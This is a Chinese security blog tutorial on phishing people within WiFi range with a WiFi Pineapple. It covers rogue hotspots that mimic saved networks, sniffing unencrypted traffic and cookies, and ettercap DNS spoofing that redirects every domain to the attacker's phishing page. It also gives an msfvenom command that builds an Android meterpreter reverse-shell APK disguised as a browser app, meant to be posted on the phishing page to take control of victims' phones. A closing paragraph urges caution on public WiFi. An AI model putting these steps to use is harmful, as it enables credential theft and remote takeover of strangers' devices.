当前位置:首页 > 未分类 > 正文内容

使用 WifiPineApple 进行范围内 局域网钓鱼

admin7年前 (2018-12-01)未分类209

作者:W22

声明:

仅供参考,勿用于非法用途,否则后果自负,与作者无关。

准备工作:

  1. WifiPineApple,可以在极客之眼的论坛上买一个汉化的。

  1. 两张无线网卡(支持监听模式的功能),推荐 RT3070L,便宜一些;如果有更大需求,可以买功率大一些的。

  1. 一个 USB 集线器,因为 PineApple 上只有一个 USB 接口。

  1. KALI Linux 渗透操作系统。

在进入正题之前,我们需要了解一下 WiFiPineApple 这个设备:

在 WifiPineApple 下有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的 /data/misc/wifi/wpa_supplicant.conf(存放手机记录的热点名称以及密码)文件,来创建 WiFi 热点的名称,它创建带密码 / 不带密码的 2 种,从而导致,附近的其他用户只要开启了 WiFi,就会自动连接到你的 PineApple 上。

下边说明实验的步骤:

0x01 连接 PineApple:

打开 PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。

**

插入网线或连接建立的热点(一般开机后需要等待 2 分钟左右),使用 web 的方式登陆 PineApple 的默认连接的地址为:http://172.16.42.1:1471

**

输入账号密码登陆(厂商提供默认口令)

我们看到以下的界面:

**

0x02 配置网络(重点):

在左侧的菜单栏中选择网络

**

在网络中我们可以看到当前网卡和 IP 地址获取的情况

**

我们需要做的配置是:一块网卡用于建立 PineAP 热点,一块网卡用于桥接其他网络,连接外网。还有一块网卡用于连接设备物理接口,和默认建立的 wifi (不能动)

最终达到这样的效果

**

0x03 进行一些嗅探和欺骗

PineApple 中有很多的插件,都可以进行对连接上的客户机,做一些 “手脚”,例如图片网址获取的功能,他可以获取到用户访问未被 SSL 加密的图片和一些网址的 URL、请求时提交的数据和 cookie 等。

当然,这些功能在 KALI 内手动进行实现,但是通过这个 web 的方式一键搭建,是不是很方便呢?

**

0x04 通过 KALI 来手动进行 dns 劫持,并且伪造钓鱼网页

  1. 启动 KALI Linux 虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子

菜单栏下的编辑 -> 虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备 (连接 PineApple 的设备)

**

  1. 配置 ip 地址,或者等待 dhcp 自动分配

  1. 可以 ping 通设备后,我们搭建一个 web 服务器 : service apache2 start

  1. 将钓鱼页面放置 /var/www/html 目录下

  1. 接下来,我们启动 ettercap 来进行 dns 欺骗 :

配置 ettercap 文件:

Vim /etc/Ettercap/etter.dns

**

修改为所有的域名都指向 172.16.42.133 也就是 KALI 的地址

  1. 启动 ettercap  Ettercap -G

Ctrl+U 启动 网卡选择桥接到 PineApple 的网卡

**

管理插件,并将 dns 欺骗功能启用

**

  1. 这时用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,

当然,如果想要更好的效果的话,可以找一个真实性更好的网页进行测试。

**

0x05 通过 msf 生成木马,远控手机或 PC。

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.42.133 LPORT=5555 > ~/360浏览器.apk

放在钓鱼页面上,等待用户 “上钩”.

具体的用法可以参考这篇文章

附上我的几个成功的例子(在被允许的情况下)

**

当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。

0x00 结语

引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的 wifi 和确定之前连接是安全的 wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接 (wifi 一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了 SSL 技术进行了加密传输,但是还是有相当一部分没有实现这项功能,所以,例如 QQ 号,还有网络浏览的一些信息以及照片,都可能被泄露,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!!例如:下载未知绑定了木马的 app 可以被攻击者利用获取短信信息 (验证码)、联系人 (诈骗),甚至摄像头 (威胁),所以要提高安全意识,不要在公共场合轻易的连接 wifi,即使是你认为可靠的。

本萌新技术水平有限,可能有些地方讲的不详细,希望大佬们可以理解一下,欢迎指出错误,随时修正并学习。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=56

分享给朋友:

“使用 WifiPineApple 进行范围内 局域网钓鱼” 的相关文章

小讲堂心得

小讲堂心得

参加小讲堂活动,是受邀两位学习部的同学十分热情的邀请,为同学们讲讲网络安全方面的知识。我感到十分荣幸,但又有些许担忧,怕讲不好,因为网络安全这个学科涉及的知识面十分宽泛,网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理...

带你挖掘文件包含漏洞之代码审计 #4 实战五个案例

带你挖掘文件包含漏洞之代码审计 #4 实战五个案例

在 PHP 安全中,文件包含漏洞是危害严重的漏洞!本文不再讲解基础概念,直接进入实战环节。一、文件包含漏洞挖掘要点核心关键字:require()、require_once()、include()、include_once()(注意:函数名中括号与参数间存在空格,效果相同);本次实战对象:CMS 系统...

制作一个隐藏在黑页下的大马并且添加后门 [制作大马后门][隐藏后门]

制作一个隐藏在黑页下的大马并且添加后门 [制作大马后门][隐藏后门]

一、声明与目录(00x01)1. 基础信息团队(Team):即刻安全 | www.secist.com作者(Author):Szrzvdny2. 内容目录(table of Contents)隐藏在黑页下的大马隐藏在 404 页面下的大马插入后门并写入收信api.php二、制作开始(00x02)1....

2017_最新过狗一句话编写_附成品 [过狗一句话][过安全狗 bypass]

2017_最新过狗一句话编写_附成品 [过狗一句话][过安全狗 bypass]

环境:php+mysql+apche安全狗:apache版本+8.10规则库即刻安全即刻安全纯技术交流群:307283889如需转载,请联系本博主声明,私自转载必追究Prat 1:思路构思以及实现在 bypass 小分队中 V@1n3R 表哥提到他明天会分享过 waf 的一句话。爱搞事的我当然不能只...

(转载)双 11 为技术宅们奉上 PentestBox 的更新升级 [PentestBox 如何更新]

(转载)双 11 为技术宅们奉上 PentestBox 的更新升级 [PentestBox 如何更新]

一、PentestBox 简介Pentest Box(渗透测试盒子)是一款 Windows 平台下预配置的便携式开源渗透测试环境,也是著名黑客 Kapustkiy 常用工具之一。它集成了大量 Linux 平台的渗透测试工具(包括 Kali Linux 常用工具),可在 Windows 系统中原生运行...

(原创)渗透某常德棋牌游戏 [棋牌游戏漏洞][逻辑漏洞][app 渗透]

(原创)渗透某常德棋牌游戏 [棋牌游戏漏洞][逻辑漏洞][app 渗透]

最近一直在当咸鱼,在家练练车,说着更新帖子,一直找不到目标站点,昨天下午收到的一条微信之后突然有了目标。声明 (本文章纯属虚构,如有雷同不胜荣幸,文中一切观点,纯属于作者瞎想与作者本人无关,大牛误喷,不带节奏谢谢!愿各位在贴吧互相帮助共同进步)还是老规则 下载了 APP 这里提示下注意事项因为这种...